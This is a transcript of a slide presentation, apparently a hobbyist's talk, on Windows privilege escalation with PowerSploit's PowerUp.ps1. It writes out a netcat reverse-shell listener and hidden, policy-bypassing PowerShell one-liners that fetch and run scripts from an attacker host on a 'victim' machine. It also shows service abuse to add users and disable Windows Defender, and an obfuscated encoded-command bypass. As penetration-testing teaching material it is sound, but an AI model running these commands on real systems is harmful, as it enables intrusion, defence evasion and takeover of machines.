20190905_Powershell_Privilege_escalation

5f9309c6fe879950878bb3d7b039a7b9?s=47 Aqua
September 05, 2019

 20190905_Powershell_Privilege_escalation

5f9309c6fe879950878bb3d7b039a7b9?s=128

Aqua

September 05, 2019
Tweet

Transcript

  1. PowerShell Privilege escalation using PowerUp.ps1 September 5, 2019

  2. Self introduction • Name : Magical analyze girl Aqua(•̀ ᴗ•́

    )و • Job : Magical girl • Twitter : @WinterLabyrinth • Discord : Aqua#6654 • Dream : Reborn in another world • Friend : Malware • Favorite Manga : Kings’ Viking • Favorite Anime : Terror in Resonance : Saga of Tanya the Evil
  3. Self introduction – My favorite anime • Terror in Resonance

  4. Self introduction – My favorite anime • Saga of Tanya

    the Evil
  5. Agenda • About PowerShell • Get low level account •

    About privilege escalation • Privilege escalation • Magical weapon (Tools) • Demo • Reference • More interesting
  6. About PowerShell • CUI based on .NET Framework and .NET

    Core • Installed from Windows 7 • Cmdlets use verb-noun names to reduce command memorization • PowerShell uses a "verb-noun" naming system. • Exapmle: • cd -> Set-Location • cat, type -> Get-Content • Alias is also registered (Check : > alias) • Script *.ps1
  7. Get low level account • I will not explain much

    here. Because there are many. • Is there a vulnerability in the service on which the system is running? • If you are in an environment where your code can run, it is best to get a Reverse shell. • Will help you (https://www.exploit-db.com/) • If you install Reverse tcp using some kind of vulnerability, tcp will return to your server. • PayloadsAllTheThings or (MSFVenom Cheatsheet. This uses a meterpriter) (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodol ogy%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) • Your Server (listen) : $ nc –lvnp 4444 # listen 4444 port
  8. About privilege escalation • Privileges Escalation means that a general

    user has higher privileges such as administrator. • Example : Dirty Cow CVE-2016-5195 (https://www.exploit- db.com/exploits/40847, etc) • Sorry for the Linux environment. It was the most affordable. The same applies to Windows.
  9. Magical weapon • Magical weapon (Tools) • PowerSploit (https://github.com/PowerShellMafia/PowerSploit) •

    PowerTools (https://github.com/PowerShellEmpire/PowerTools) • Nishang (https://github.com/samratashok/nishang) • RedTeam_CheatSheet.ps1 (https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70) • Easy-P (from The Hacker Playbook)
  10. Magical weapon (PowerSploit/Privesc/PowerUp.ps1) • If you are connected to the

    Internet, you can download it from Github PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.co m/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks • The most common way I end up using PowerUp is by using the Invoke-AllChecks function, which runs through all relevant checks for the machine and outputs a status report:
  11. • Download PowerShell script on your server • Bypassing the

    option -ExecutionPolicy of the PowerShell command, you can temporarily change the execution policy and execute the script. • Your server : $ python –m SimpleHTTPServer 80 • Victim Server (cmd.exe) : > Powershell.exe -nop -exec bypass -w hidden -c "iex (New-Object Net.WebClient).DownloadString('http://<LHOST>/PowerUp.ps1'); Invoke-AllChecks" powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" Magical weapon (PowerSploit/Privesc/PowerUp.ps1) About PowerShell.exe - Microsoft Docs -noni = -NonInteractive -nop = -NoProfile -exec = -ExecutionPolicy -W Hidden = WindowStyle -C = Command
  12. Magical weapon (PowerSploit/Privesc/PowerUp.ps1) • Example Usage 1. C:> powershell.exe -nop

    -exec bypass 2. PS C:\> Import-Module PowerUp.ps1 3. PS C:\> Invoke-AllChecks 4. If an Abuse Function is found 1. Adding a new user with password with -User and -Password options PS C:\> Invoke-ServiceAbuse -Name ‘< AbuseService>' -User <User> -Password <Password> 2. Running a custom command (Disable Windows Defender) PS C:\> Invoke-ServiceAbuse -Name ‘< AbuseService>' -Command "Set- MpPreference -DisableRealtimeMonitoring $true" 5. PS C:\>Restart-Computer -Force
  13. Magical weapon (tips) • File download (victim side) powershell -nop

    -exec bypass -w hidden -c "iex (New-Object System.Net.WebClient).DownloadFile('http://<LHOST>/file', ‘C:\Users\user\Downloads\file’)" Note : It was necessary to specify the download path. • Advanced iex = Invoke-Expression • Filter bypass • -enc <base64 text> • PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden –EnCodeDcOmmAnd <base64 text>
  14. Demo Umm..

  15. Demo • Get password. I used this information to get

    the Administrator shell.
  16. Demo Umm.. I don't know about DLL injection.

  17. Reflection • However, this is only a touch of PowerUp.ps1.

    I will continue my research. Let's verify together. PowerSploit has many tools
  18. More interesting… But PowerUp.ps1 may have little to do with

  19. Magical weapon (Windows-Exploit-Suggester) • Usage • (Victim Windows) C:> systeminfo

    >> systeminfo.txt • $ ./windows-exploit-suggester.py --database 2014-06-06- mssb.xlsx --systeminfo systeminfo.txt • $ ./windows-exploit-suggester.py --database 2014-06-06- mssb.xlsx --ostext 'windows server 2008 r2'
  20. Magical weapon (Windows-Exploit-Suggester) • I tested on Windows 7 Service

    Pack 1
  21. Magical weapon (Windows-Exploit-Suggester) • I used MS14-040 • CVE-2014-1767 •

    'afd.sys' Dangling Pointer Privilege Escalation
  22. Playground • Hack The Box is a great place to

    learn privilege escalation. • There are also attacks on boxes using vulnerabilities.
  23. Reference • PowerUp: A Usage Guide (https://www.harmj0y.net/blog/powershell/powerup-a-usage- guide/) • Advanced

    PowerUp.ps1 Usage (https://recipeforroot.com/advanced-powerup-ps1-usage/) • Privilege Escalation Using PowerShell (https://hacknpentest.com/windows-privilege-escalation-using- powershell/)
  24. More interesting • Window Privilege Escalation via Automated Script (https://www.hackingarticles.in/window-privilege-escalation-via-

    automated-script/) • Windows Privilege Escalation Scripts & Techniques (https://medium.com/@rahmatnurfauzi/windows-privilege- escalation-scripts-techniques-30fa37bd194)
  25. Thanks for Listening.